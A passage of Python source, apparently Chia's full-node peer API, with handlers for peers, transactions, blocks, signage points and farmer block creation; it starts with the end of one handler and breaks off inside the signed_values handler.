next_ses_height = ses_height[idx + 1]
# start_ses_hash
if ses_start_height <= start_height < next_ses_height:
ses_hash_heights.append([ses_start_height, next_ses_height])
ses: SubEpochSummary = self.full_node.blockchain.get_ses(ses_start_height)
ses_reward_hashes.append(ses.reward_chain_hash)
if ses_start_height < end_height < next_ses_height:
break
else:
if idx == len(ses_height) - 2:
break
# else add extra ses as request start <-> end spans two ses
next_next_height = ses_height[idx + 2]
ses_hash_heights.append([next_ses_height, next_next_height])
nex_ses: SubEpochSummary = self.full_node.blockchain.get_ses(next_ses_height)
ses_reward_hashes.append(nex_ses.reward_chain_hash)
break
response = RespondSESInfo(ses_reward_hashes, ses_hash_heights)
msg = make_msg(ProtocolMessageTypes.respond_ses_hashes, response)
return msg
| 47.811796
| 120
| 0.645049
|
import asyncio
import dataclasses
import time
import traceback
from secrets import token_bytes
from typing import Dict, List, Optional, Tuple, Set
from blspy import AugSchemeMPL, G2Element
from chiabip158 import PyBIP158
import chia.server.ws_connection as ws
from chia.consensus.block_creation import create_unfinished_block
from chia.consensus.block_record import BlockRecord
from chia.consensus.pot_iterations import calculate_ip_iters, calculate_iterations_quality, calculate_sp_iters
from chia.full_node.bundle_tools import best_solution_generator_from_template, simple_solution_generator
from chia.full_node.full_node import FullNode
from chia.full_node.mempool_check_conditions import get_puzzle_and_solution_for_coin
from chia.full_node.signage_point import SignagePoint
from chia.protocols import farmer_protocol, full_node_protocol, introducer_protocol, timelord_protocol, wallet_protocol
from chia.protocols.full_node_protocol import RejectBlock, RejectBlocks
from chia.protocols.protocol_message_types import ProtocolMessageTypes
from chia.protocols.wallet_protocol import (
PuzzleSolutionResponse,
RejectHeaderBlocks,
RejectHeaderRequest,
CoinState,
RespondSESInfo,
)
from chia.server.outbound_message import Message, make_msg
from chia.types.blockchain_format.coin import Coin, hash_coin_list
from chia.types.blockchain_format.pool_target import PoolTarget
from chia.types.blockchain_format.program import Program
from chia.types.blockchain_format.sized_bytes import bytes32
from chia.types.blockchain_format.sub_epoch_summary import SubEpochSummary
from chia.types.coin_record import CoinRecord
from chia.types.end_of_slot_bundle import EndOfSubSlotBundle
from chia.types.full_block import FullBlock
from chia.types.generator_types import BlockGenerator
from chia.types.mempool_inclusion_status import MempoolInclusionStatus
from chia.types.mempool_item import MempoolItem
from chia.types.peer_info import PeerInfo
from chia.types.transaction_queue_entry import TransactionQueueEntry
from chia.types.unfinished_block import UnfinishedBlock
from chia.util.api_decorators import api_request, peer_required, bytes_required, execute_task, reply_type
from chia.util.generator_tools import get_block_header
from chia.util.hash import std_hash
from chia.util.ints import uint8, uint32, uint64, uint128
from chia.util.merkle_set import MerkleSet
class FullNodeAPI:
full_node: FullNode
def __init__(self, full_node) -> None:
self.full_node = full_node
@property
def server(self):
return self.full_node.server
@property
def log(self):
return self.full_node.log
@property
def api_ready(self):
return self.full_node.initialized
@peer_required
@api_request
@reply_type([ProtocolMessageTypes.respond_peers])
async def request_peers(self, _request: full_node_protocol.RequestPeers, peer: ws.WSChiaConnection):
if peer.peer_server_port is None:
return None
peer_info = PeerInfo(peer.peer_host, peer.peer_server_port)
if self.full_node.full_node_peers is not None:
msg = await self.full_node.full_node_peers.request_peers(peer_info)
return msg
@peer_required
@api_request
async def respond_peers(
self, request: full_node_protocol.RespondPeers, peer: ws.WSChiaConnection
) -> Optional[Message]:
self.log.debug(f"Received {len(request.peer_list)} peers")
if self.full_node.full_node_peers is not None:
await self.full_node.full_node_peers.respond_peers(request, peer.get_peer_info(), True)
return None
@peer_required
@api_request
async def respond_peers_introducer(
self, request: introducer_protocol.RespondPeersIntroducer, peer: ws.WSChiaConnection
) -> Optional[Message]:
self.log.debug(f"Received {len(request.peer_list)} peers from introducer")
if self.full_node.full_node_peers is not None:
await self.full_node.full_node_peers.respond_peers(request, peer.get_peer_info(), False)
await peer.close()
return None
@execute_task
@peer_required
@api_request
async def new_peak(self, request: full_node_protocol.NewPeak, peer: ws.WSChiaConnection) -> Optional[Message]:
waiter_count = len(self.full_node.new_peak_sem._waiters)
if waiter_count > 0:
self.full_node.log.debug(f"new_peak Waiters: {waiter_count}")
if waiter_count > 20:
return None
async with self.full_node.new_peak_sem:
return await self.full_node.new_peak(request, peer)
@peer_required
@api_request
async def new_transaction(
self, transaction: full_node_protocol.NewTransaction, peer: ws.WSChiaConnection
) -> Optional[Message]:
if self.full_node.sync_store.get_sync_mode():
return None
if not (await self.full_node.synced()):
return None
if self.full_node.mempool_manager.seen(transaction.transaction_id):
return None
if self.full_node.mempool_manager.is_fee_enough(transaction.fees, transaction.cost):
if transaction.transaction_id in self.full_node.full_node_store.pending_tx_request:
if transaction.transaction_id in self.full_node.full_node_store.peers_with_tx:
current_set = self.full_node.full_node_store.peers_with_tx[transaction.transaction_id]
if peer.peer_node_id in current_set:
return None
current_set.add(peer.peer_node_id)
return None
else:
new_set = set()
new_set.add(peer.peer_node_id)
self.full_node.full_node_store.peers_with_tx[transaction.transaction_id] = new_set
return None
self.full_node.full_node_store.pending_tx_request[transaction.transaction_id] = peer.peer_node_id
new_set = set()
new_set.add(peer.peer_node_id)
self.full_node.full_node_store.peers_with_tx[transaction.transaction_id] = new_set
async def tx_request_and_timeout(full_node: FullNode, transaction_id, task_id):
counter = 0
try:
while True:
# Limit to asking to a few peers, it's possible that this tx got included on chain already
# drop some transactions, we don't want to refetch too many times
if counter == 5:
break
if transaction_id not in full_node.full_node_store.peers_with_tx:
break
peers_with_tx: Set = full_node.full_node_store.peers_with_tx[transaction_id]
if len(peers_with_tx) == 0:
break
peer_id = peers_with_tx.pop()
assert full_node.server is not None
if peer_id not in full_node.server.all_connections:
continue
peer = full_node.server.all_connections[peer_id]
request_tx = full_node_protocol.RequestTransaction(transaction.transaction_id)
msg = make_msg(ProtocolMessageTypes.request_transaction, request_tx)
await peer.send_message(msg)
await asyncio.sleep(5)
counter += 1
if full_node.mempool_manager.seen(transaction_id):
break
except asyncio.CancelledError:
pass
finally:
if transaction_id in full_node.full_node_store.peers_with_tx:
full_node.full_node_store.peers_with_tx.pop(transaction_id)
if transaction_id in full_node.full_node_store.pending_tx_request:
full_node.full_node_store.pending_tx_request.pop(transaction_id)
if task_id in full_node.full_node_store.tx_fetch_tasks:
full_node.full_node_store.tx_fetch_tasks.pop(task_id)
task_id: bytes32 = bytes32(token_bytes(32))
fetch_task = asyncio.create_task(
tx_request_and_timeout(self.full_node, transaction.transaction_id, task_id)
)
self.full_node.full_node_store.tx_fetch_tasks[task_id] = fetch_task
return None
return None
@api_request
@reply_type([ProtocolMessageTypes.respond_transaction])
async def request_transaction(self, request: full_node_protocol.RequestTransaction) -> Optional[Message]:
if self.full_node.sync_store.get_sync_mode():
return None
spend_bundle = self.full_node.mempool_manager.get_spendbundle(request.transaction_id)
if spend_bundle is None:
return None
transaction = full_node_protocol.RespondTransaction(spend_bundle)
msg = make_msg(ProtocolMessageTypes.respond_transaction, transaction)
return msg
@peer_required
@api_request
@bytes_required
async def respond_transaction(
self,
tx: full_node_protocol.RespondTransaction,
peer: ws.WSChiaConnection,
tx_bytes: bytes = b"",
test: bool = False,
) -> Optional[Message]:
assert tx_bytes != b""
spend_name = std_hash(tx_bytes)
if spend_name in self.full_node.full_node_store.pending_tx_request:
self.full_node.full_node_store.pending_tx_request.pop(spend_name)
if spend_name in self.full_node.full_node_store.peers_with_tx:
self.full_node.full_node_store.peers_with_tx.pop(spend_name)
if self.full_node.transaction_queue.qsize() % 100 == 0 and not self.full_node.transaction_queue.empty():
self.full_node.log.debug(f"respond_transaction Waiters: {self.full_node.transaction_queue.qsize()}")
if self.full_node.transaction_queue.full():
self.full_node.dropped_tx.add(spend_name)
return None
await self.full_node.transaction_queue.put(
(0, TransactionQueueEntry(tx.transaction, tx_bytes, spend_name, peer, test))
)
return None
@api_request
@reply_type([ProtocolMessageTypes.respond_proof_of_weight])
async def request_proof_of_weight(self, request: full_node_protocol.RequestProofOfWeight) -> Optional[Message]:
if self.full_node.weight_proof_handler is None:
return None
if not self.full_node.blockchain.contains_block(request.tip):
self.log.error(f"got weight proof request for unknown peak {request.tip}")
return None
if request.tip in self.full_node.pow_creation:
event = self.full_node.pow_creation[request.tip]
await event.wait()
wp = await self.full_node.weight_proof_handler.get_proof_of_weight(request.tip)
else:
event = asyncio.Event()
self.full_node.pow_creation[request.tip] = event
wp = await self.full_node.weight_proof_handler.get_proof_of_weight(request.tip)
event.set()
tips = list(self.full_node.pow_creation.keys())
if len(tips) > 4:
for i in range(0, 4):
self.full_node.pow_creation.pop(tips[i])
if wp is None:
self.log.error(f"failed creating weight proof for peak {request.tip}")
return None
if (
self.full_node.full_node_store.serialized_wp_message_tip is not None
and self.full_node.full_node_store.serialized_wp_message_tip == request.tip
):
return self.full_node.full_node_store.serialized_wp_message
message = make_msg(
ProtocolMessageTypes.respond_proof_of_weight, full_node_protocol.RespondProofOfWeight(wp, request.tip)
)
self.full_node.full_node_store.serialized_wp_message_tip = request.tip
self.full_node.full_node_store.serialized_wp_message = message
return message
@api_request
async def respond_proof_of_weight(self, request: full_node_protocol.RespondProofOfWeight) -> Optional[Message]:
self.log.warning("Received proof of weight too late.")
return None
@api_request
@reply_type([ProtocolMessageTypes.respond_block, ProtocolMessageTypes.reject_block])
async def request_block(self, request: full_node_protocol.RequestBlock) -> Optional[Message]:
if not self.full_node.blockchain.contains_height(request.height):
reject = RejectBlock(request.height)
msg = make_msg(ProtocolMessageTypes.reject_block, reject)
return msg
header_hash: Optional[bytes32] = self.full_node.blockchain.height_to_hash(request.height)
if header_hash is None:
return make_msg(ProtocolMessageTypes.reject_block, RejectBlock(request.height))
block: Optional[FullBlock] = await self.full_node.block_store.get_full_block(header_hash)
if block is not None:
if not request.include_transaction_block and block.transactions_generator is not None:
block = dataclasses.replace(block, transactions_generator=None)
return make_msg(ProtocolMessageTypes.respond_block, full_node_protocol.RespondBlock(block))
return make_msg(ProtocolMessageTypes.reject_block, RejectBlock(request.height))
@api_request
@reply_type([ProtocolMessageTypes.respond_blocks, ProtocolMessageTypes.reject_blocks])
async def request_blocks(self, request: full_node_protocol.RequestBlocks) -> Optional[Message]:
if request.end_height < request.start_height or request.end_height - request.start_height > 32:
reject = RejectBlocks(request.start_height, request.end_height)
msg: Message = make_msg(ProtocolMessageTypes.reject_blocks, reject)
return msg
for i in range(request.start_height, request.end_height + 1):
if not self.full_node.blockchain.contains_height(uint32(i)):
reject = RejectBlocks(request.start_height, request.end_height)
msg = make_msg(ProtocolMessageTypes.reject_blocks, reject)
return msg
if not request.include_transaction_block:
blocks: List[FullBlock] = []
for i in range(request.start_height, request.end_height + 1):
header_hash_i: Optional[bytes32] = self.full_node.blockchain.height_to_hash(uint32(i))
if header_hash_i is None:
reject = RejectBlocks(request.start_height, request.end_height)
return make_msg(ProtocolMessageTypes.reject_blocks, reject)
block: Optional[FullBlock] = await self.full_node.block_store.get_full_block(header_hash_i)
if block is None:
reject = RejectBlocks(request.start_height, request.end_height)
return make_msg(ProtocolMessageTypes.reject_blocks, reject)
block = dataclasses.replace(block, transactions_generator=None)
blocks.append(block)
msg = make_msg(
ProtocolMessageTypes.respond_blocks,
full_node_protocol.RespondBlocks(request.start_height, request.end_height, blocks),
)
else:
blocks_bytes: List[bytes] = []
for i in range(request.start_height, request.end_height + 1):
header_hash_i = self.full_node.blockchain.height_to_hash(uint32(i))
if header_hash_i is None:
reject = RejectBlocks(request.start_height, request.end_height)
return make_msg(ProtocolMessageTypes.reject_blocks, reject)
block_bytes: Optional[bytes] = await self.full_node.block_store.get_full_block_bytes(header_hash_i)
if block_bytes is None:
reject = RejectBlocks(request.start_height, request.end_height)
msg = make_msg(ProtocolMessageTypes.reject_blocks, reject)
return msg
blocks_bytes.append(block_bytes)
respond_blocks_manually_streamed: bytes = (
bytes(uint32(request.start_height))
+ bytes(uint32(request.end_height))
+ len(blocks_bytes).to_bytes(4, "big", signed=False)
)
for block_bytes in blocks_bytes:
respond_blocks_manually_streamed += block_bytes
msg = make_msg(ProtocolMessageTypes.respond_blocks, respond_blocks_manually_streamed)
return msg
@api_request
async def reject_block(self, request: full_node_protocol.RejectBlock):
self.log.debug(f"reject_block {request.height}")
@api_request
async def reject_blocks(self, request: full_node_protocol.RejectBlocks):
self.log.debug(f"reject_blocks {request.start_height} {request.end_height}")
@api_request
async def respond_blocks(self, request: full_node_protocol.RespondBlocks) -> None:
self.log.warning("Received unsolicited/late blocks")
return None
@api_request
@peer_required
async def respond_block(
self,
respond_block: full_node_protocol.RespondBlock,
peer: ws.WSChiaConnection,
) -> Optional[Message]:
self.log.warning(f"Received unsolicited/late block from peer {peer.get_peer_logging()}")
return None
@api_request
async def new_unfinished_block(
self, new_unfinished_block: full_node_protocol.NewUnfinishedBlock
) -> Optional[Message]:
if self.full_node.sync_store.get_sync_mode():
return None
block_hash = new_unfinished_block.unfinished_reward_hash
if self.full_node.full_node_store.get_unfinished_block(block_hash) is not None:
return None
if block_hash in self.full_node.full_node_store.requesting_unfinished_blocks:
return None
msg = make_msg(
ProtocolMessageTypes.request_unfinished_block,
full_node_protocol.RequestUnfinishedBlock(block_hash),
)
self.full_node.full_node_store.requesting_unfinished_blocks.add(block_hash)
async def eventually_clear():
await asyncio.sleep(5)
if block_hash in self.full_node.full_node_store.requesting_unfinished_blocks:
self.full_node.full_node_store.requesting_unfinished_blocks.remove(block_hash)
asyncio.create_task(eventually_clear())
return msg
@api_request
@reply_type([ProtocolMessageTypes.respond_unfinished_block])
async def request_unfinished_block(
self, request_unfinished_block: full_node_protocol.RequestUnfinishedBlock
) -> Optional[Message]:
unfinished_block: Optional[UnfinishedBlock] = self.full_node.full_node_store.get_unfinished_block(
request_unfinished_block.unfinished_reward_hash
)
if unfinished_block is not None:
msg = make_msg(
ProtocolMessageTypes.respond_unfinished_block,
full_node_protocol.RespondUnfinishedBlock(unfinished_block),
)
return msg
return None
@peer_required
@api_request
@bytes_required
async def respond_unfinished_block(
self,
respond_unfinished_block: full_node_protocol.RespondUnfinishedBlock,
peer: ws.WSChiaConnection,
respond_unfinished_block_bytes: bytes = b"",
) -> Optional[Message]:
if self.full_node.sync_store.get_sync_mode():
return None
await self.full_node.respond_unfinished_block(
respond_unfinished_block, peer, block_bytes=respond_unfinished_block_bytes
)
return None
@api_request
@peer_required
async def new_signage_point_or_end_of_sub_slot(
self, new_sp: full_node_protocol.NewSignagePointOrEndOfSubSlot, peer: ws.WSChiaConnection
) -> Optional[Message]:
if self.full_node.sync_store.get_sync_mode():
return None
if (
self.full_node.full_node_store.get_signage_point_by_index(
new_sp.challenge_hash,
new_sp.index_from_challenge,
new_sp.last_rc_infusion,
)
is not None
):
return None
if self.full_node.full_node_store.have_newer_signage_point(
new_sp.challenge_hash, new_sp.index_from_challenge, new_sp.last_rc_infusion
):
return None
if new_sp.index_from_challenge == 0 and new_sp.prev_challenge_hash is not None:
if self.full_node.full_node_store.get_sub_slot(new_sp.prev_challenge_hash) is None:
collected_eos = []
challenge_hash_to_request = new_sp.challenge_hash
last_rc = new_sp.last_rc_infusion
num_non_empty_sub_slots_seen = 0
for _ in range(30):
if num_non_empty_sub_slots_seen >= 3:
self.log.debug("Diverged from peer. Don't have the same blocks")
return None
# If this is an end of sub slot, and we don't have the prev, request the prev instead
full_node_request = full_node_protocol.RequestSignagePointOrEndOfSubSlot(
challenge_hash_to_request, uint8(0), last_rc
)
response = await peer.request_signage_point_or_end_of_sub_slot(full_node_request, timeout=10)
if not isinstance(response, full_node_protocol.RespondEndOfSubSlot):
self.full_node.log.debug(f"Invalid response for slot {response}")
return None
collected_eos.append(response)
if (
self.full_node.full_node_store.get_sub_slot(
response.end_of_slot_bundle.challenge_chain.challenge_chain_end_of_slot_vdf.challenge
)
is not None
or response.end_of_slot_bundle.challenge_chain.challenge_chain_end_of_slot_vdf.challenge
== self.full_node.constants.GENESIS_CHALLENGE
):
for eos in reversed(collected_eos):
await self.respond_end_of_sub_slot(eos, peer)
return None
if (
response.end_of_slot_bundle.challenge_chain.challenge_chain_end_of_slot_vdf.number_of_iterations
!= response.end_of_slot_bundle.reward_chain.end_of_slot_vdf.number_of_iterations
):
num_non_empty_sub_slots_seen += 1
challenge_hash_to_request = (
response.end_of_slot_bundle.challenge_chain.challenge_chain_end_of_slot_vdf.challenge
)
last_rc = response.end_of_slot_bundle.reward_chain.end_of_slot_vdf.challenge
self.full_node.log.warning("Failed to catch up in sub-slots")
return None
if new_sp.index_from_challenge > 0:
if (
new_sp.challenge_hash != self.full_node.constants.GENESIS_CHALLENGE
and self.full_node.full_node_store.get_sub_slot(new_sp.challenge_hash) is None
):
full_node_request = full_node_protocol.RequestSignagePointOrEndOfSubSlot(
new_sp.challenge_hash, uint8(0), new_sp.last_rc_infusion
)
return make_msg(ProtocolMessageTypes.request_signage_point_or_end_of_sub_slot, full_node_request)
# Otherwise (we have the prev or the end of sub slot), request it normally
full_node_request = full_node_protocol.RequestSignagePointOrEndOfSubSlot(
new_sp.challenge_hash, new_sp.index_from_challenge, new_sp.last_rc_infusion
)
return make_msg(ProtocolMessageTypes.request_signage_point_or_end_of_sub_slot, full_node_request)
@api_request
@reply_type([ProtocolMessageTypes.respond_signage_point, ProtocolMessageTypes.respond_end_of_sub_slot])
async def request_signage_point_or_end_of_sub_slot(
self, request: full_node_protocol.RequestSignagePointOrEndOfSubSlot
) -> Optional[Message]:
if request.index_from_challenge == 0:
sub_slot: Optional[Tuple[EndOfSubSlotBundle, int, uint128]] = self.full_node.full_node_store.get_sub_slot(
request.challenge_hash
)
if sub_slot is not None:
return make_msg(
ProtocolMessageTypes.respond_end_of_sub_slot,
full_node_protocol.RespondEndOfSubSlot(sub_slot[0]),
)
else:
if self.full_node.full_node_store.get_sub_slot(request.challenge_hash) is None:
if request.challenge_hash != self.full_node.constants.GENESIS_CHALLENGE:
self.log.info(f"Don't have challenge hash {request.challenge_hash}")
sp: Optional[SignagePoint] = self.full_node.full_node_store.get_signage_point_by_index(
request.challenge_hash,
request.index_from_challenge,
request.last_rc_infusion,
)
if sp is not None:
assert (
sp.cc_vdf is not None
and sp.cc_proof is not None
and sp.rc_vdf is not None
and sp.rc_proof is not None
)
full_node_response = full_node_protocol.RespondSignagePoint(
request.index_from_challenge,
sp.cc_vdf,
sp.cc_proof,
sp.rc_vdf,
sp.rc_proof,
)
return make_msg(ProtocolMessageTypes.respond_signage_point, full_node_response)
else:
self.log.info(f"Don't have signage point {request}")
return None
@peer_required
@api_request
async def respond_signage_point(
self, request: full_node_protocol.RespondSignagePoint, peer: ws.WSChiaConnection
) -> Optional[Message]:
if self.full_node.sync_store.get_sync_mode():
return None
async with self.full_node.timelord_lock:
# Already have signage point
if self.full_node.full_node_store.have_newer_signage_point(
request.challenge_chain_vdf.challenge,
request.index_from_challenge,
request.reward_chain_vdf.challenge,
):
return None
existing_sp = self.full_node.full_node_store.get_signage_point(
request.challenge_chain_vdf.output.get_hash()
)
if existing_sp is not None and existing_sp.rc_vdf == request.reward_chain_vdf:
return None
peak = self.full_node.blockchain.get_peak()
if peak is not None and peak.height > self.full_node.constants.MAX_SUB_SLOT_BLOCKS:
next_sub_slot_iters = self.full_node.blockchain.get_next_slot_iters(peak.header_hash, True)
sub_slots_for_peak = await self.full_node.blockchain.get_sp_and_ip_sub_slots(peak.header_hash)
assert sub_slots_for_peak is not None
ip_sub_slot: Optional[EndOfSubSlotBundle] = sub_slots_for_peak[1]
else:
sub_slot_iters = self.full_node.constants.SUB_SLOT_ITERS_STARTING
next_sub_slot_iters = sub_slot_iters
ip_sub_slot = None
added = self.full_node.full_node_store.new_signage_point(
request.index_from_challenge,
self.full_node.blockchain,
self.full_node.blockchain.get_peak(),
next_sub_slot_iters,
SignagePoint(
request.challenge_chain_vdf,
request.challenge_chain_proof,
request.reward_chain_vdf,
request.reward_chain_proof,
),
)
if added:
await self.full_node.signage_point_post_processing(request, peer, ip_sub_slot)
else:
self.log.debug(
f"Signage point {request.index_from_challenge} not added, CC challenge: "
f"{request.challenge_chain_vdf.challenge}, RC challenge: {request.reward_chain_vdf.challenge}"
)
return None
@peer_required
@api_request
async def respond_end_of_sub_slot(
self, request: full_node_protocol.RespondEndOfSubSlot, peer: ws.WSChiaConnection
) -> Optional[Message]:
if self.full_node.sync_store.get_sync_mode():
return None
msg, _ = await self.full_node.respond_end_of_sub_slot(request, peer)
return msg
@peer_required
@api_request
async def request_mempool_transactions(
self,
request: full_node_protocol.RequestMempoolTransactions,
peer: ws.WSChiaConnection,
) -> Optional[Message]:
received_filter = PyBIP158(bytearray(request.filter))
items: List[MempoolItem] = await self.full_node.mempool_manager.get_items_not_in_filter(received_filter)
for item in items:
transaction = full_node_protocol.RespondTransaction(item.spend_bundle)
msg = make_msg(ProtocolMessageTypes.respond_transaction, transaction)
await peer.send_message(msg)
return None
# FARMER PROTOCOL
@api_request
@peer_required
async def declare_proof_of_space(
self, request: farmer_protocol.DeclareProofOfSpace, peer: ws.WSChiaConnection
) -> Optional[Message]:
if self.full_node.sync_store.get_sync_mode():
return None
async with self.full_node.timelord_lock:
sp_vdfs: Optional[SignagePoint] = self.full_node.full_node_store.get_signage_point(
request.challenge_chain_sp
)
if sp_vdfs is None:
self.log.warning(f"Received proof of space for an unknown signage point {request.challenge_chain_sp}")
return None
if request.signage_point_index > 0:
assert sp_vdfs.rc_vdf is not None
if sp_vdfs.rc_vdf.output.get_hash() != request.reward_chain_sp:
self.log.debug(
f"Received proof of space for a potentially old signage point {request.challenge_chain_sp}. "
f"Current sp: {sp_vdfs.rc_vdf.output.get_hash()}"
)
return None
if request.signage_point_index == 0:
cc_challenge_hash: bytes32 = request.challenge_chain_sp
else:
assert sp_vdfs.cc_vdf is not None
cc_challenge_hash = sp_vdfs.cc_vdf.challenge
pos_sub_slot: Optional[Tuple[EndOfSubSlotBundle, int, uint128]] = None
if request.challenge_hash != self.full_node.constants.GENESIS_CHALLENGE:
# Checks that the proof of space is a response to a recent challenge and valid SP
pos_sub_slot = self.full_node.full_node_store.get_sub_slot(cc_challenge_hash)
if pos_sub_slot is None:
self.log.warning(f"Received proof of space for an unknown sub slot: {request}")
return None
total_iters_pos_slot: uint128 = pos_sub_slot[2]
else:
total_iters_pos_slot = uint128(0)
assert cc_challenge_hash == request.challenge_hash
# Now we know that the proof of space has a signage point either:
# 1. In the previous sub-slot of the peak (overflow)
# 2. In the same sub-slot as the peak
# 3. In a future sub-slot that we already know of
# Checks that the proof of space is valid
quality_string: Optional[bytes32] = request.proof_of_space.verify_and_get_quality_string(
self.full_node.constants, cc_challenge_hash, request.challenge_chain_sp
)
assert quality_string is not None and len(quality_string) == 32
# Grab best transactions from Mempool for given tip target
aggregate_signature: G2Element = G2Element()
block_generator: Optional[BlockGenerator] = None
additions: Optional[List[Coin]] = []
removals: Optional[List[Coin]] = []
async with self.full_node._blockchain_lock_high_priority:
peak: Optional[BlockRecord] = self.full_node.blockchain.get_peak()
if peak is not None:
# Finds the last transaction block before this one
curr_l_tb: BlockRecord = peak
while not curr_l_tb.is_transaction_block:
curr_l_tb = self.full_node.blockchain.block_record(curr_l_tb.prev_hash)
try:
mempool_bundle = await self.full_node.mempool_manager.create_bundle_from_mempool(
curr_l_tb.header_hash
)
except Exception as e:
self.log.error(f"Traceback: {traceback.format_exc()}")
self.full_node.log.error(f"Error making spend bundle {e} peak: {peak}")
mempool_bundle = None
if mempool_bundle is not None:
spend_bundle = mempool_bundle[0]
additions = mempool_bundle[1]
removals = mempool_bundle[2]
self.full_node.log.info(f"Add rem: {len(additions)} {len(removals)}")
aggregate_signature = spend_bundle.aggregated_signature
if self.full_node.full_node_store.previous_generator is not None:
self.log.info(
f"Using previous generator for height "
f"{self.full_node.full_node_store.previous_generator}"
)
block_generator = best_solution_generator_from_template(
self.full_node.full_node_store.previous_generator, spend_bundle
)
else:
block_generator = simple_solution_generator(spend_bundle)
def get_plot_sig(to_sign, _) -> G2Element:
if to_sign == request.challenge_chain_sp:
return request.challenge_chain_sp_signature
elif to_sign == request.reward_chain_sp:
return request.reward_chain_sp_signature
return G2Element()
def get_pool_sig(_1, _2) -> Optional[G2Element]:
return request.pool_signature
prev_b: Optional[BlockRecord] = self.full_node.blockchain.get_peak()
# Finds the previous block from the signage point, ensuring that the reward chain VDF is correct
if prev_b is not None:
if request.signage_point_index == 0:
if pos_sub_slot is None:
self.log.warning("Pos sub slot is None")
return None
rc_challenge = pos_sub_slot[0].reward_chain.end_of_slot_vdf.challenge
else:
assert sp_vdfs.rc_vdf is not None
rc_challenge = sp_vdfs.rc_vdf.challenge
# Backtrack through empty sub-slots
for eos, _, _ in reversed(self.full_node.full_node_store.finished_sub_slots):
if eos is not None and eos.reward_chain.get_hash() == rc_challenge:
rc_challenge = eos.reward_chain.end_of_slot_vdf.challenge
found = False
attempts = 0
while prev_b is not None and attempts < 10:
if prev_b.reward_infusion_new_challenge == rc_challenge:
found = True
break
if prev_b.finished_reward_slot_hashes is not None and len(prev_b.finished_reward_slot_hashes) > 0:
if prev_b.finished_reward_slot_hashes[-1] == rc_challenge:
# This block includes a sub-slot which is where our SP vdf starts. Go back one more
# to find the prev block
prev_b = self.full_node.blockchain.try_block_record(prev_b.prev_hash)
found = True
break
prev_b = self.full_node.blockchain.try_block_record(prev_b.prev_hash)
attempts += 1
if not found:
self.log.warning("Did not find a previous block with the correct reward chain hash")
return None
try:
finished_sub_slots: Optional[
List[EndOfSubSlotBundle]
] = self.full_node.full_node_store.get_finished_sub_slots(
self.full_node.blockchain, prev_b, cc_challenge_hash
)
if finished_sub_slots is None:
return None
if (
len(finished_sub_slots) > 0
and pos_sub_slot is not None
and finished_sub_slots[-1] != pos_sub_slot[0]
):
self.log.error("Have different sub-slots than is required to farm this block")
return None
except ValueError as e:
self.log.warning(f"Value Error: {e}")
return None
if prev_b is None:
pool_target = PoolTarget(
self.full_node.constants.GENESIS_PRE_FARM_POOL_PUZZLE_HASH,
uint32(0),
)
farmer_ph = self.full_node.constants.GENESIS_PRE_FARM_FARMER_PUZZLE_HASH
else:
farmer_ph = request.farmer_puzzle_hash
if request.proof_of_space.pool_contract_puzzle_hash is not None:
pool_target = PoolTarget(request.proof_of_space.pool_contract_puzzle_hash, uint32(0))
else:
assert request.pool_target is not None
pool_target = request.pool_target
if peak is None or peak.height <= self.full_node.constants.MAX_SUB_SLOT_BLOCKS:
difficulty = self.full_node.constants.DIFFICULTY_STARTING
sub_slot_iters = self.full_node.constants.SUB_SLOT_ITERS_STARTING
else:
difficulty = uint64(peak.weight - self.full_node.blockchain.block_record(peak.prev_hash).weight)
sub_slot_iters = peak.sub_slot_iters
for sub_slot in finished_sub_slots:
if sub_slot.challenge_chain.new_difficulty is not None:
difficulty = sub_slot.challenge_chain.new_difficulty
if sub_slot.challenge_chain.new_sub_slot_iters is not None:
sub_slot_iters = sub_slot.challenge_chain.new_sub_slot_iters
required_iters: uint64 = calculate_iterations_quality(
self.full_node.constants.DIFFICULTY_CONSTANT_FACTOR,
quality_string,
request.proof_of_space.size,
difficulty,
request.challenge_chain_sp,
)
sp_iters: uint64 = calculate_sp_iters(self.full_node.constants, sub_slot_iters, request.signage_point_index)
ip_iters: uint64 = calculate_ip_iters(
self.full_node.constants,
sub_slot_iters,
request.signage_point_index,
required_iters,
)
# The block's timestamp must be greater than the previous transaction block's timestamp
timestamp = uint64(int(time.time()))
curr: Optional[BlockRecord] = prev_b
while curr is not None and not curr.is_transaction_block and curr.height != 0:
curr = self.full_node.blockchain.try_block_record(curr.prev_hash)
if curr is not None:
assert curr.timestamp is not None
if timestamp <= curr.timestamp:
timestamp = uint64(int(curr.timestamp + 1))
self.log.info("Starting to make the unfinished block")
unfinished_block: UnfinishedBlock = create_unfinished_block(
self.full_node.constants,
total_iters_pos_slot,
sub_slot_iters,
request.signage_point_index,
sp_iters,
ip_iters,
request.proof_of_space,
cc_challenge_hash,
farmer_ph,
pool_target,
get_plot_sig,
get_pool_sig,
sp_vdfs,
timestamp,
self.full_node.blockchain,
b"",
block_generator,
aggregate_signature,
additions,
removals,
prev_b,
finished_sub_slots,
)
self.log.info("Made the unfinished block")
if prev_b is not None:
height: uint32 = uint32(prev_b.height + 1)
else:
height = uint32(0)
self.full_node.full_node_store.add_candidate_block(quality_string, height, unfinished_block)
foliage_sb_data_hash = unfinished_block.foliage.foliage_block_data.get_hash()
if unfinished_block.is_transaction_block():
foliage_transaction_block_hash = unfinished_block.foliage.foliage_transaction_block_hash
else:
foliage_transaction_block_hash = bytes32([0] * 32)
assert foliage_transaction_block_hash is not None
message = farmer_protocol.RequestSignedValues(
quality_string,
foliage_sb_data_hash,
foliage_transaction_block_hash,
)
await peer.send_message(make_msg(ProtocolMessageTypes.request_signed_values, message))
# Adds backup in case the first one fails
if unfinished_block.is_transaction_block() and unfinished_block.transactions_generator is not None:
unfinished_block_backup = create_unfinished_block(
self.full_node.constants,
total_iters_pos_slot,
sub_slot_iters,
request.signage_point_index,
sp_iters,
ip_iters,
request.proof_of_space,
cc_challenge_hash,
farmer_ph,
pool_target,
get_plot_sig,
get_pool_sig,
sp_vdfs,
timestamp,
self.full_node.blockchain,
b"",
None,
G2Element(),
None,
None,
prev_b,
finished_sub_slots,
)
self.full_node.full_node_store.add_candidate_block(
quality_string, height, unfinished_block_backup, backup=True
)
return None
@api_request
@peer_required
async def signed_values(
self, farmer_request: farmer_protocol.SignedValues, peer: ws.WSChiaConnection
) -> Optional[Message]:
candidate_tuple: Optional[Tuple[uint32, UnfinishedBlock]] = self.full_node.full_node_store.get_candidate_block(
farmer_request.quality_string
)
if candidate_tuple is None:
self.log.warning(f"Quality string {farmer_request.quality_string} not found in database")
return None
height, candidate = candidate_tuple
if not AugSchemeMPL.verify(
candidate.reward_chain_block.proof_of_space.plot_public_key,
